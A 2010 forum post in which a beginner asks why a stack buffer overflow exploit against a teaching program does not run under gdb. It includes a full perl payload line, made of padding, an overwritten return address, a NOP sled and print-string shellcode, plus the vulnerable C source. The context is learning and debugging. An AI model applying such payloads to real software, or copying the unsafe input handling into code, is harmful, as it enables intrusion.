Posted: Thu Mar 25, 2010 10:05 pm Post subject: Buffer overflow question
I"ve been trying to write my first buffer overflow and come across some problems. This is being done on a public piece of code in a buffer overflow paper and is completely non-malicious
I discovered where past my buffer the EIP lies and overwrote it with an address pointing to a series of NOPs on the stack, followed by a piece of shellcode I found on the internet written to print the string "now I pown your computer"
What baffles me is why the program (under gdb) does not seem to be jumping to the shellcode or executing it. Following is a little output from gdb showing my situation.
The string I used to overflow the buffer and overwrite the EIP is:
perl -e 'print "A"x268, "\xf8\xf2\xff\xbf", "\x90"x30, "\xeb\x19\x31\xc0\x31\xdb\x31\xd2\x31\xc9\xb0\x04\xb3\x01\x59\xb2\x18\xcd", "\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\xe2\xff\xff\xff\x6e\x6f\x77\x20", "\x49\x20\x70\x30\x77\x6e\x20\x79\x6f\x75\x72\x20\x63\x6f\x6d\x70\x75\x74", "\x65\x72"' > input
/*
* convert newlines to nulls in place
*/
void purgenewlines(char *s)
{
int l;
l = strlen(s);
while (l--)
if (s[l] == '\n')
s[l] = '\0';
}
int main()
{
char scapegoat[INPUT_BUFFER];
getline(scapegoat);
/* this check ensures there's no buffer overflow */
if (strlen(scapegoat) < INPUT_BUFFER) {
purgenewlines(scapegoat);
printf("It's all %s's fault.\n", scapegoat);
}
return 0;
}
The shellcode starts at 0xbffff30E and ends at 0xbffff345
The EIP should return to the noops at 0xbffff2f8 and continue until it executes the shell code, correct? If so why am I not seeing output?
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum